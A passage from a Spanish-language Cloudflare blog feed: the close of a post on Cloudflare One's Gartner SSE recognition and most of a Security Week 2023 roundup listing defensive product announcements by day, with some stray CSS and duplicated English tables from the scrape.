nuestra red</a> para lograr escala y <a href="/extending-the-life-of-hardware/">rentabilidad</a>.</p><p>El tráfico de las redes internas de las mayores empresas (aún) no iguala el volumen ni siquiera de las propiedades de Internet relativamente populares. Cuando estos equipos envían tráfico a Cloudflare One, confiamos en el mismo hardware y los mismos centros de datos en los que se basan nuestros servicios de aplicaciones para aplicar funciones de seguridad y de red. Como resultado, podemos proporcionar seguridad integral a cualquier equipo a un precio solo posible gracias a nuestra inversión existente en nuestra red.</p><p><b>5) Cloudflare puede ser tu único proveedor de seguridad consolidado</b>Cloudflare One es solo el componente más reciente de la plataforma de Cloudflare en ser reconocido en los informes de los analistas del sector. En 2022 Gartner nombró a Cloudflare empresa líder en <a href="/cloudflare-waap-named-leader-gartner-magic-quadrant-2022/">protección de API y aplicaciones web (WAAP)</a>. Cuando los clientes seleccionan Cloudflare para resolver sus desafíos de SSE, tienen la oportunidad de añadir las mejores soluciones de su clase, todas ellas del mismo proveedor.</p><p>Docenas de empresas de analistas <a href="https://www.cloudflare.com/analysts/">independienteshttps://www.cloudflare.com/analysts/</a> siguen reconociendo a Cloudflare por nuestra capacidad de proporcionar resultados a nuestros cientes en servicios que incluyen, entre otros, la protección contra DDoS, CDN y edge computing y la gestión de bots.</p>
    <div>
      <h2>¿Y después?</h2>
      <a href="#y-despues">
        
      </a>
    </div>
    <p>Cuando los clientes eligen Cloudflare One, confían en nuestra red para proteger los aspectos más confidenciales de su empresa sin ralentizar su negocio. Agradecemos a más de 10 000 organizaciones que nos han seleccionado como su proveedor durante los últimos cinco años, desde pequeños equipos con nuestro plan gratuito hasta <a href="https://www.cloudflare.com/nl-nl/case-studies/">empresas de la lista Fortune 500</a> y <a href="/helping-keep-governments-safe-and-secure/">agencias del gobierno</a>.</p><p>El anuncio de hoy solo acelera el impulso de Cloudflare One. Estamos centrados en desarrollar la siguiente generación de funciones de seguridad y conectividad que nuestros clientes necesitan para seguir centrándose en su propia misión. Continuaremos avanzado cada vez más rápido para ayudar a cada vez más organizaciones. ¿Quieres empezar ese recorrido con nosotros? Indícanoslo <a href="https://www.cloudflare.com/products/zero-trust/plans/enterprise/">aquí</a> y nos pondremos en contacto contigo.</p><p>Gartner, "Magic Quadrant for Security Service Edge", Analista(s): Charlie Winckless, Aaron McQuaid, John Watts, Craig Lawson, Thomas Lintemuth, Dale Koeppen, 10 de abril de 2023.</p><p>......</p><p><sup>1</sup><a href="https://www.gartner.com/en/information-technology/glossary/security-service-edge-sse">https://www.gartner.com/en/information-technology/glossary/security-service-edge-sse</a></p><p>GARTNER es una marca comercial y una marca de servicio de Gartner y Magic Quadrant es una marca comercial de Gartner, Inc. o sus filiales en los Estados Unidos e internacionalmente, y se usan aquí con permiso. Todos los derechos reservados.Gartner no representa a ningún proveedor, producto o servicio descrito en sus publicaciones de investigación y no recomienda a los usuarios de tecnología que seleccionen únicamente aquellos proveedores con las calificaciones más altas u otra designación. Las publicaciones de investigación de Gartner consisten en las opiniones de la organización de investigación de Gartner y no deben interpretarse como declaraciones de hecho. Gartner renuncia a todas las garantías, expresadas o implícitas, con respecto a esta investigación, incluida cualquier garantía de comerciabilidad o idoneidad para un propósito particular.</p> ]]></content:encoded>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Gartner (ES)]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <guid isPermaLink="false">6PFNNYIxIykzs5nijXYK8</guid>
            <dc:creator>Sam Rhea</dc:creator>
        </item>
        <item>
            <title><![CDATA[Resumen de todo lo que tal vez te hayas perdido durante Security Week 2023]]></title>
            <link>https://blog.cloudflare.com/es-es/security-week-2023-wrap-up/</link>
            <pubDate>Mon, 20 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ Descubre cómo Cloudflare ha conseguido proteger no solo las aplicaciones sino también a los usuarios estén donde estén durante Security Week 2023 ]]></description>
            <content:encoded><![CDATA[ <p>Security Week 2023 ha concluido oficialmente. En nuestra <a href="/welcome-to-security-week-2023/">publicación de bienvenida del sábado pasado</a>, hablé de los avances de Cloudflare a lo largo de los años en lo que respecta a la protección de sitios web, aplicaciones y usuarios. Nuestro objetivo esta semana era ayudar a nuestros clientes a resolver diferentes problemas, reducir los puntos de vulnerabilidad externos y facilitarles el trabajo.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/60Kso4XsCtJn6Ye4Ukzr4T/d4344147b06e9c920babd4e0fa5f1968/Security-Week-2023-Hero-Dark-1.png" />
            
            </figure><p>Hemos anunciado 34 nuevas herramientas e integraciones que harán precisamente eso. Todas ellas en su conjunto te ayudarán a agilizar y simplificar las siguientes tareas:</p><ol><li><p>Facilitar la implementación y gestión de la arquitectura Zero Trust en cualquier parte.</p></li><li><p>Reducir el número de proveedores externos que los clientes deben utilizar.</p></li><li><p>Aprovecha el aprendizaje automático para permitir que los humanos se centren en el pensamiento crítico</p></li><li><p>Poner a disposición de los clientes más información propia de Cloudflare sobre amenazas.</p></li><li><p>Dificultar que los usuarios cometan errores.</p></li></ol><p>Además, para ayudarte a responder a los ataques más recientes en tiempo real, hemos informado sobre cómo los <a href="/how-sophisticated-scammers-and-phishers-are-preying-on-customers-of-silicon-valley-bank/">estafadores están utilizando la noticia de Silicon Valley Bank</a> para engañar a nuevas víctimas, y qué puedes hacer para protegerte.</p><p>En caso de que te hayas perdido alguno de nuestros anuncios, echa un vistazo al resumen y a la guía de navegación que encontrarás a continuación.</p>
    <div>
      <h3>Lunes</h3>
      <a href="#lunes">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-ycd2{background-color:#F63;color:#FFF;font-weight:bold;text-align:center;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top} .tg .tg-ktyi{background-color:#FFF;text-align:left;vertical-align:top} .tg .tg-dm87{background-color:#FFF;color:#15C;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/50-most-impersonated-brands-protect-phishing/"><span>Top phished brands and new phishing and brand protections</span></a><br /></td>
    <td><span>Today we have released insights from our global network on the top 50 brands used in phishing attacks coupled with the tools customers need to stay safer. Our new phishing and brand protection capabilities, part of Security Center, let customers better preserve brand trust by detecting and even blocking “confusable” and lookalike domains involved in phishing campaigns.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/stay-safe-phishing-attacks/"><span>How to stay safe from phishing</span></a></td>
    <td><span>Phishing attacks come in all sorts of ways to fool people. Email is definitely the most common, but there are others. Following up on our Top 50 brands in phishing attacks post, here are some tips to help you catch these scams before you fall for them.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/page-shield-positive-blocking-policies/"><span>Locking down your JavaScript: positive blocking with Page Shield policies</span></a></td>
    <td><span>Page Shield now ensures only vetted and secure JavaScript is being executed by browsers to stop unwanted or malicious JavaScript from loading to keep end user data safer. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/cloudflare-aegis/"><span>Cloudflare Aegis: dedicated IPs for Zero Trust migration</span></a><br /></td>
    <td><span>With Aegis, customers can now get dedicated IPs from Cloudflare we use to send them traffic. This allows customers to lock down services and applications at an IP level and build a protected environment that is application, protocol, and even IP-aware.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/mtls-workers/"><span>Mutual TLS now available for Workers</span></a></td>
    <td><span>mTLS support for Workers allows for communication with resources that enforce an mTLS connection. mTLS provides greater security for those building on Workers so they can identify and authenticate both the client and the server helps protect sensitive data.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/access-aegis-cni/"><span>Using Cloudflare Access with CNI</span></a></td>
    <td><span>We have introduced an innovative new approach to secure hosted applications via Cloudflare Access without the need for any installed software or custom code on application servers.</span></td>
  </tr>
</tbody>
</table><p>Blog</p>
<table>
<thead>
  <tr>
    <th><span>Blog </span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/descaler-program/"><span>No hassle migration from Zscaler to Cloudflare One with The Descaler Program</span></a></td>
    <td><span>Cloudflare is excited to launch the Descaler Program, a frictionless path to migrate existing Zscaler customers to Cloudflare One. With this announcement, Cloudflare is making it even easier for enterprise customers to make the switch to a </span><a href="http://staging.blog.mrk.cfdata.org/network-performance-update-cio-edition/"><span>faster</span></a><span>, simpler, and more agile foundation for security and network transformation.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/application-security-2023/"><span>The state of application security in 2023</span></a></td>
    <td><span>For Security Week 2023, we are providing updated insights and trends related to mitigated traffic, bot and API traffic, and <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/">account takeover attacks</a>.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/zero-trust-signals-to-sumo-logic/"><span>Adding Zero Trust signals to Sumo Logic for better security insights</span></a></td>
    <td><span>Today we’re excited to announce the expansion of support for automated normalization and correlation of Zero Trust logs for </span><a href="https://developers.cloudflare.com/logs/about/"><span>Logpush</span></a><span> in Sumo Logic’s </span><a href="https://www.sumologic.com/solutions/cloud-siem-enterprise/"><span>Cloud SIEM</span></a><span>. Joint customers will reduce alert fatigue and accelerate the triage process by converging security and network data into high-fidelity insights.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/cloudflare-dlp-mip/"><span>Cloudflare One DLP integrates with Microsoft Information Protection labels</span></a></td>
    <td><a href="https://www.cloudflare.com/cloudflare-one/"><span>Cloudflare One</span></a><span> now offers Data Loss Prevention (DLP) detections for Microsoft Purview Information Protection labels. This extends the power of Microsoft’s labels to any of your corporate traffic in just a few clicks.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/scan-atlassian-casb/"><span>Scan and secure Atlassian with Cloudflare CASB</span></a></td>
    <td><span>We are unveiling two new integrations for Cloudflare CASB: one for Atlassian Confluence and the other for Atlassian Jira. Security teams can begin scanning for Atlassian- and Confluence-specific security issues that may be leaving sensitive corporate data at risk.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/cloudflare-ping/"><span>Zero Trust security with Ping Identity and Cloudflare Access</span></a></td>
    <td><span>Cloudflare Access and Ping Identity offer a powerful solution for organizations looking to implement Zero Trust security controls to protect their applications and data. Cloudflare is now offering </span><a href="https://developers.cloudflare.com/cloudflare-one/identity/idp-integration/pingone-oidc/"><span>full integration support</span></a><span>, so Ping Identity customers can easily integrate their identity management solutions with Cloudflare Access to provide a comprehensive security solution for their applications</span></td>
  </tr>
</tbody>
</table><p>Resumen</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/cloudflare-fraud-detection/"><span>Announcing Cloudflare Fraud Detection</span></a></td>
    <td><span>We are excited to announce Cloudflare Fraud Detection that will provide precise, easy to use tools that can be deployed in seconds to detect and categorize fraud such as fake account creation or card testing and fraudulent transactions. Fraud Detection will be in early access later this year, those interested </span><a href="https://www.cloudflare.com/lp/fraud-detection/"><span>can sign up here</span></a><span>. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/ml-api-discovery-and-schema-learning/"><span>Automatically discovering API endpoints and generating schemas using machine learning</span></a></td>
    <td><span>Customers can use these new features to enforce a positive security model on their API endpoints even if they have little-to-no information about their existing APIs today.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/api-sequence-analytics/"><span>Detecting API abuse automatically using sequence analysis</span></a><br /></td>
    <td><span>With our new Cloudflare Sequence Analytics for APIs, organizations can view the most important sequences of API requests to their endpoints to better understand potential abuse and where to apply protections first. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/threat-detection-machine-learning-models/"><span>Using the power of Cloudflare’s global network to detect malicious domains using machine learning</span></a></td>
    <td><span>Read our post on how we keep users and organizations safer with machine learning models that detect attackers attempting to evade detection with DNS tunneling and domain generation algorithms.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/waf-attack-score-for-business-plan/"><span>Announcing WAF Attack Score Lite and Security Analytics for business customers</span></a></td>
    <td><span>We are making the machine learning empowered WAF and Security analytics view available to our Business plan customers, to help detect and stop attacks before they are known.</span><br /></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/radar-url-scanner-early-access/"><span>Analyze any URL safely using the Cloudflare Radar URL Scanner</span></a></td>
    <td><span>We have made Cloudflare Radar’s newest free tool available, </span><a href="https://radar.cloudflare.com/scan"><span>URL Scanner</span></a><span>, providing an under-the-hood look at any webpage to make the Internet more transparent and secure for all.</span></td>
  </tr>
</tbody>
</table><p><a href="/es-es/50-most-impersonated-brands-protect-phishing-es-es/">Principales marcas más utilizadas en ataques de phishing y nuevas protecciones de marca y contra el phishing</a></p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/post-quantum-crypto-should-be-free/"><span>Post-quantum crypto should be free, so we’re including it for free, forever</span></a></td>
    <td><span>One of our core beliefs is that privacy is a human right. To achieve that right, we are announcing that our implementations of post-quantum cryptography will be available to everyone, free of charge, forever.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/kyber-isnt-broken/"><span>No, AI did not break post-quantum cryptography</span></a></td>
    <td><span>The recent news reports of AI cracking post-quantum cryptography are greatly exaggerated. In this blog, we take a deep dive into the world of side-channel attacks and how AI has been used for more than a decade already to aid it</span><span>.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/configurable-super-bot-fight-mode/"><span>Super Bot Fight Mode is now configurable</span></a><br /></td>
    <td><span>We are making Super Bot Fight Mode even more configurable with new flexibility to allow legitimate, automated traffic to access their site.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/ibm-keyless-bots/"><span>How Cloudflare and IBM partner to help build a better Internet</span></a></td>
    <td><span>IBM and Cloudflare continue to partner together to help customers meet the unique security, performance, resiliency and compliance needs of their customers through the addition of exciting new product and service offerings.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/protect-your-key-server-with-keyless-ssl-and-cloudflare-tunnel-integration/"><span>Protect your key server with Keyless SSL and Cloudflare</span></a><a href="http://staging.blog.mrk.cfdata.org/protect-your-key-server-with-keyless-ssl-and-cloudflare-tunnel-integration/"><span> </span></a><a href="http://staging.blog.mrk.cfdata.org/protect-your-key-server-with-keyless-ssl-and-cloudflare-tunnel-integration/"><span>Tunnel integration</span></a></td>
    <td><span>Customers will now be able to use our Cloudflare Tunnels product to send traffic to the key server through a secure channel, without publicly exposing it to the rest of the Internet.</span></td>
  </tr>
</tbody>
</table><p>Hoy hemos publicado información procedente de nuestra red global sobre las 50 marcas más utilizadas en ataques de phishing, junto con las herramientas que los clientes necesitan para estar más protegidos. Nuestras nuevas funciones de protección de marca y contra el phishing, que forman parte de nuestro Centro de seguridad, permiten a los clientes preservar mejor la confianza en las marcas detectando e incluso bloqueando los dominios confusos y de imitación vinculados a las campañas de phishing.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/DMARC-Management"><span>Stop Brand Impersonation with Cloudflare DMARC Management</span></a><span> </span></td>
    <td><span>Brand impersonation continues to be a big problem globally. Setting SPF, DKIM and DMARC policies is a great way to reduce that risk, and protect your domains from being used in spoofing emails. But maintaining a correct SPF configuration can be very costly and time consuming, and that’s why we’re launching Cloudflare DMARC Management.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/how-we-built-dmarc-management"><span>How we built DMARC Management using Cloudflare Workers</span></a></td>
    <td><span>At Cloudflare, we use the Workers platform and our product stack to build new services. Read how we made the new DMARC Management solution entirely on top of our APIs.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/Knowbe4-emailsecurity-integration"><span>Cloudflare partners with KnowBe4 to equip organizations with real-time security coaching to avoid phishing attacks</span></a></td>
    <td><span>Cloudflare’s cloud email security solution now integrates with KnowBe4, allowing mutual customers to offer real-time coaching to employees when a phishing campaign is detected by Cloudflare.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/access-custom-pages"><span>Introducing custom pages for Cloudflare Access</span></a></td>
    <td><span>We are excited to announce new options to customize user experience in Access, including customizable pages including login, blocks and the application launcher.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/network-performance-update-security-week-2023/"><span>Cloudflare Access is the fastest Zero Trust proxy</span></a></td>
    <td><span>Cloudflare Access is 75% faster than Netskope and 50% faster than Zscaler, and our network is faster than other providers in 48% of last mile networks.</span></td>
  </tr>
</tbody>
</table><p><a href="/es-es/stay-safe-phishing-attacks-es-es/">Cómo protegerse del phishing</a></p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/one-click-iso-27001-deployment"><span>One-click ISO 27001 certified deployment of Regional Services in the EU</span></a></td>
    <td><span>Cloudflare announces one-click ISO certified region, a super easy way for customers to limit where traffic is serviced to ISO 27001 certified data centers inside the European Union.</span><br /></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/account-security-analytics-and-events"><span>Account level Security Analytics and Security Events: better visibility and control over all account zones at once</span></a></td>
    <td><span>All WAF customers will benefit fromAccount Security Analytics and Events. This allows organizations to new eyes on your account in Cloudflare dashboard to give holistic visibility. No matter how many zones you manage, they are all there!</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/access-wildcard-and-multi-hostname/"><span>Wildcard and multi-hostname support in Cloudflare Access</span></a><br /></td>
    <td><span>We are thrilled to announce the full support of wildcard and multi-hostname application definitions in Cloudflare Access. Until now, Access had limitations that restricted it to a single hostname or a limited set of wildcards</span></td>
  </tr>
</tbody>
</table><p>Los ataques de phishing se presentan de todas las formas posibles para engañar a los usuarios. El correo electrónico es sin duda la más común, pero hay otras. Como continuación a nuestra publicación sobre las 50 marcas más utilizadas en ataques de phishing, aquí tienes algunos consejos para ayudarte a detectar estas estafas antes de que sea demasiado tarde.</p><div></div><p><a href="/page-shield-positive-blocking-policies/">Bloquea tu JavaScript: bloqueo positivo con políticas Page Shield</a></p><p>Page Shield garantiza ahora que los navegadores solo ejecuten JavaScript seguro y verificado, para evitar que se cargue JavaScript no deseado o malicioso y garantizar una mayor seguridad de los datos de los usuarios finales.</p><p><a href="/cloudflare-aegis/">Cloudflare Aegis: direcciones IP dedicadas para la migración a Zero Trust</a></p><p>Con Aegis, los clientes pueden obtener ahora direcciones IP dedicadas de Cloudflare que utilizamos para enviarles tráfico. Esta novedad permite a los clientes bloquear servicios y aplicaciones a nivel de IP y crear un entorno protegido que sea consciente de las aplicaciones, protocolos e incluso de las direcciones IP.</p><p><a href="/mtls-workers/">Mutual TLS, ya disponible para Workers</a></p><p>La compatibilidad con mTLS para Workers permite la comunicación con recursos que exigen una conexión mTLS. mTLS ofrece mayor seguridad a los desarrolladores en Workers, de modo que pueden identificar y autenticar tanto al cliente como al servidor, lo que ayuda a proteger los datos confidenciales.</p><p><a href="/access-aegis-cni/">Cloudflare Access con CNI</a></p><p>Hemos implementado un nuevo enfoque innovador para proteger las aplicaciones alojadas a través de Cloudflare Access sin necesidad de instalar software ni código personalizado en tu servidor de aplicaciones.</p>
    <div>
      <h3>Martes</h3>
      <a href="#martes">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-ycd2{background-color:#F63;color:#FFF;font-weight:bold;text-align:center;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Blog</p><p>Resumen</p><p>   <a href="/es-es/descaler-program-es-es/">Migración   sencilla de Zscaler a Cloudflare One con el programa Descaler</a>   </p><p>   Cloudflare está entusiasmado con el   lanzamiento del programa Descaler, una ruta que permite la migración de los   clientes de Zscaler a Cloudflare One sin dificultades. Con este anuncio,   Cloudflare facilita aún más que los clientes empresariales puedan realizar el   cambio a una base más <a href="/es-es/network-performance-update-cio-edition-es-es/">rápida</a>, sencilla y ágil para la   transformación de la seguridad y de la red.   </p><p>   <a href="/application-security-2023/">El estado de la seguridad de las aplicaciones en 2023</a>   </p><p>   Durante Security Week 2023, ofreceremos   información actualizada y presentaremos las tendencias del tráfico mitigado,   así como del tráfico relacionado con los bots y las API, y los ataques de   apropiación de cuentas.   </p><p>   <a href="/es-es/zero-trust-signals-to-sumo-logic-es-es/">Incorporación de señales Zero Trust en Sumo Logic para   mejorar la información sobre seguridad</a>   </p><p>   Hoy nos complace anunciar la ampliación de   la compatibilidad con la normalización y correlación automatizadas de   registros Zero Trust para <a href="https://developers.cloudflare.com/logs/about/">Logpush</a>   en Cloud SIEM de <a href="https://www.sumologic.com/solutions/cloud-siem-enterprise/">Sumo Logic</a>. Los clientes comunes reducirán   la sensación de malestar con las alertas y acelerarán el proceso de   evaluación mediante la convergencia de datos de seguridad y de red con   información muy precisa.   </p><p>   <a href="/es-es/cloudflare-dlp-mip-es-es/">La función de prevención de pérdida de datos de   Cloudflare One se integra con las etiquetas de confidencialidad de Microsoft</a>   </p><p>   <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare   One</a> ofrece ahora detecciones de prevención de pérdida de datos   para las etiquetas de confidencialidad de Microsoft Purview. Esta nueva   herramienta amplía la eficacia de las etiquetas de Microsoft a todo tu   tráfico corporativo con solo unos clics.   </p><p>   <a href="/es-es/scan-atlassian-casb-es-es/">Analiza y protege Atlassian con Cloudflare CASB</a>   </p><p>   Presentamos dos nuevas integraciones para   Cloudflare CASB: una para Atlassian Confluence y otra para Atlassian Jira.   Los equipos de seguridad pueden empezar su análisis en busca de problemas de   seguridad específicos de Atlassian y Confluence que puedan estar poniendo en   riesgo datos corporativos confidenciales.   </p><p>   <a href="/cloudflare-ping/">Seguridad   Zero Trust con Ping Identity y Cloudflare Access</a>   </p><p>   Cloudflare Access y Ping Identity ofrecen   una solución eficaz a las organizaciones que buscan implementar controles de   seguridad Zero Trust para proteger sus aplicaciones y datos. Cloudflare   ofrece ahora <a href="https://developers.cloudflare.com/cloudflare-one/identity/idp-integration/pingone-oidc/">pleno soporte a la integración</a>, de modo que   los clientes de Ping Identity pueden integrar fácilmente sus soluciones de   gestión de identidades con Cloudflare Access para proporcionar una solución   de seguridad integral para sus aplicaciones.   </p><p>   <a href="/how-sophisticated-scammers-and-phishers-are-preying-on-customers-of-silicon-valley-bank/">Cómo los autores de estafas y ataques de phishing   sofisticados se aprovechan de los clientes del Silicon Valley Bank</a>   </p><p>   Analizamos cómo los atacantes están   utilizando la noticia de Silicon Valley Bank (SVB) para aprovecharse de los   clientes del banco.   </p>
    <div>
      <h3>Miércoles</h3>
      <a href="#miercoles">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-ycd2{background-color:#F63;color:#FFF;font-weight:bold;text-align:center;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Blog</p><p>Resumen</p><p>   <a href="/es-es/cloudflare-fraud-detection-es-es/">Cloudflare Fraud Detection</a>   </p><p>   Nos complace anunciar Cloudflare Fraud   Detection, que proporcionará herramientas precisas y fáciles de usar que se   pueden implementar en cuestión de segundos para detectar y clasificar el   fraude, como la creación de cuentas falsas o la comprobación de tarjetas y   transacciones fraudulentas. El acceso anticipado a Fraud Detection estará   disponible a finales de este año y los interesados <a href="https://www.cloudflare.com/lp/fraud-detection/">pueden inscribirse aquí</a>.    </p><p>   <a href="/ml-api-discovery-and-schema-learning/">Identificación   automática de puntos finales de la API y generación de esquemas mediante el   aprendizaje automático</a>      </p><p>   Los clientes pueden utilizar estas nuevas   funciones para aplicar un modelo de seguridad positivo en sus puntos finales   de la API, incluso si hoy en día tienen poca o ninguna información sobre sus   API existentes.   </p><p>   <a href="/api-sequence-analytics/">Detección automática del abuso de las API mediante el   análisis de secuencias</a>      </p><p>   Con nuestra nueva   solución Cloudflare Sequence Analytics para las API, las organizaciones   pueden ver las secuencias más importantes de llamadas API a sus puntos   finales para comprender mejor los posibles abusos y dónde aplicar primero las   protecciones.    </p><p>   <a href="/threat-detection-machine-learning-models/">Utiliza la capacidad de la red global   de Cloudflare para detectar dominios maliciosos mediante el aprendizaje   automático</a>   </p><p>   Lee nuestra   publicación sobre cómo garantizamos la protección de los usuarios y las   organizaciones con modelos de aprendizaje automático que detectan a los   atacantes que intentan eludir la detección con algoritmos de generación de   dominios y túneles DNS.   </p><p>   <a href="/waf-attack-score-for-business-plan/">Novedad: WAF Attack Score Lite y análisis de seguridad   para clientes Business</a>   </p><p>   Ponemos a disposición de nuestros clientes   del plan Business la visualización de los análisis de seguridad y WAF con la   tecnología del aprendizaje automático para ayudar a detectar y detener los   ataques antes de que se conozcan.   </p><p>      </p><p>   <a href="/radar-url-scanner-early-access/">Analiza cualquier URL de forma segura   con URL Scanner de Cloudflare Radar</a>   </p><p>   Hemos puesto a   disposición de los usuarios la última herramienta gratuita de Cloudflare   Radar, <a href="https://radar.cloudflare.com/scan">URL Scanner</a>, que   ofrece un análisis en detalle de cualquier página web para que Internet sea   más transparente y segura para todos.   </p>
    <div>
      <h3>Jueves</h3>
      <a href="#jueves">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-ycd2{background-color:#F63;color:#FFF;font-weight:bold;text-align:center;vertical-align:top} .tg .tg-dm87{background-color:#FFF;color:#15C;text-align:left;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top} .tg .tg-brl1{color:#222;text-align:left;vertical-align:top}</p><p>Blog</p><p>Resumen</p><p>   <a href="/es-es/post-quantum-crypto-should-be-free-es-es/">Nadie debería pagar por la criptografía poscuántica,   por eso la ofrecemos de manera gratuita por tiempo ilimitado.</a>   </p><p>   Una de nuestras convicciones fundamentales   es que la privacidad es un derecho de las personas. Para lograr ese derecho,   anunciamos la disponibilidad general de nuestras implementaciones de   criptografía poscuántica, sin coste y por tiempo ilimitado.   </p><p>   <a href="/kyber-isnt-broken/">No, la IA no ha descifrado la criptografía poscuántica</a>   </p><p>   Las noticias recientes   que sugieren que la IA ha descifrado la criptografía poscuántica son   exageradas. En este blog, nos adentramos en el mundo de los ataques de canal   lateral y mostramos cómo la IA se ha utilizado durante más de una década para   este fin.   </p><p>   <a href="/configurable-super-bot-fight-mode/">¡Ya puedes configurar el modo Super Bot Fight!</a>      </p><p>   El modo Super Bot Fight es ahora más fácil   de configurar y más flexible para permitir que el tráfico legítimo y   automatizado acceda a su sitio.   </p><p>   <a href="/ibm-keyless-bots/">Cloudflare e IBM se asocian para   ayudar a mejorar Internet</a>   </p><p>   IBM y Cloudflare siguen colaborando para   ayudar a los clientes a satisfacer sus necesidades exclusivas de seguridad,   rendimiento, resistencia y conformidad normativa mediante la incorporación de   nuevas e interesantes soluciones de productos y servicios.   </p><p>   <a href="/protect-your-key-server-with-keyless-ssl-and-cloudflare-tunnel-integration/">Protege tu   servidor de claves con la</a> <a href="/protect-your-key-server-with-keyless-ssl-and-cloudflare-tunnel-integration/"></a><a href="/protect-your-key-server-with-keyless-ssl-and-cloudflare-tunnel-integration/">integración de SSL   sin clave y Cloudflare Tunnel</a>   </p><p>   Ahora los clientes podrán utilizar nuestro   producto Cloudflare Tunnel para enviar tráfico al servidor de claves a través   de un canal seguro, sin exponerlo públicamente al resto de Internet.   </p>
    <div>
      <h3>Viernes</h3>
      <a href="#viernes">
        
      </a>
    </div>
